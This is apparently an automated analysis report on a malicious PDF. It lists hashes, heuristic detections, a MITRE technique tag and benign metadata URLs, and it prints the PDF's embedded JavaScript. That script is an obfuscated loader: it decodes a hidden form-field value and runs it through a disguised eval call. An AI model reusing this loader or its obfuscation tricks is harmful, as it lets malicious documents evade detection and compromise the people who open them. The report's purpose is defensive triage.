PDF malware analysis — malicious · 47344cbc38078b81

MALICIOUS

PDF

59.5 KB Created: 2012-07-31 22:05:59 +04:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-09

MD5: d6e69b8973562a5be392fa8c549c89e5 SHA-1: 0f92832676ecc55a9729a2a87286778ed406d99e SHA-256: 47344cbc38078b81ea01f35c0a8fa28f131b6072f6d154a958513d83faf282fb

118 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is often used to download and execute further malicious content. The JavaScript stream was identified as 'javascript_obj0106_000.js'. The obfuscated nature of the script and the ML detection suggest a malicious intent, likely to compromise the user's system.

Machine Learning

Nyx PDF Classifier malicious score 0.9991

Heuristics 5

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
function hqergdfgagasgfqw(sadsfjkgAD){var jdhjkashfhaui = "0"; return jdhjkashfhaui+sadsfjkgAD;}
function jwtegasgasfadsfawef(asd){return String.fromCharCode(asd);}
function hqrgasfgasdgqw(str){return str.replace(/p/g,",");}
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0106_000.js`	pdf-javascript-stream	PDF /JS object 106 at offset 0xEA36	1495 bytes
SHA-256: `d43bcd028e652447a8db196e3a42ffe17857a4707648126219647a7fcf312b5b`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function grwafsadfdf(){ function qrgwfasdfqwefwafa(str){var set='';var s='';var ee=''; str = hqrgasfgasdgqw(str); str = str.split(","); for(var i=0;i<str.length;i++){ ee=str[i]/(18/6); set+=iuwergfdsgqwargasdf(ee.toString(64/4));} return set;} function jtwhsdgxcvbewbsdfg(hex) { var str = '';var zzz=jwtegasgasfadsfawef; for (var i = 0; i < hex.length; i += 2){ var sssss = hex.substr(i,2); str +=jwtegasgasfadsfawef('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss); }return str;} function hqrsfbxbegrqewgsg(input2) {var asdf =qrgwfasdfqwefwafa(input2) ; var asfdsad = jtwhsdgxcvbewbsdfg(asdf); return asfdsad;} function hqergdfgagasgfqw(sadsfjkgAD){var jdhjkashfhaui = "0"; return jdhjkashfhaui+sadsfjkgAD;} function jwtegasgasfadsfawef(asd){return String.fromCharCode(asd);} function hqrgasfgasdgqw(str){return str.replace(/p/g,",");} function iuwergfdsgqwargasdf(eds){var set='';var s=eds; if (s.length<2) {set=hqergdfgagasgfqw(s);} else{set=s;} return set;} function ghsgffsadfsadf(d,dd){return d+dd;} var b2=getField("Text1"); var aDFsdfasd=b2.value; var aDFsdfasd=hqrsfbxbegrqewgsg(aDFsdfasd); var ohgioahgopqwpgasdfqwf = app.alert['constructor']; var hqgasdfqw="false";var jdhkluyrrtj="true"; var jyethwerewfg="gakljsdhjkashkvhjaksjldadsf"; var ojopdghosasopas=jdhkluyrrtj[(3+3)/2]; ojopdghosasopas+=jyethwerewfg[(14+14)/2]; ojopdghosasopas+=hqgasdfqw[((1+9)/5)-1]; ojopdghosasopas+=hqgasdfqw[(2+10)/6]; ohgioahgopqwpgasdfqwf[ojopdghosasopas](aDFsdfasd); } grwafsadfdf();

Open this report in the interactive analyzer, or submit your own file for analysis.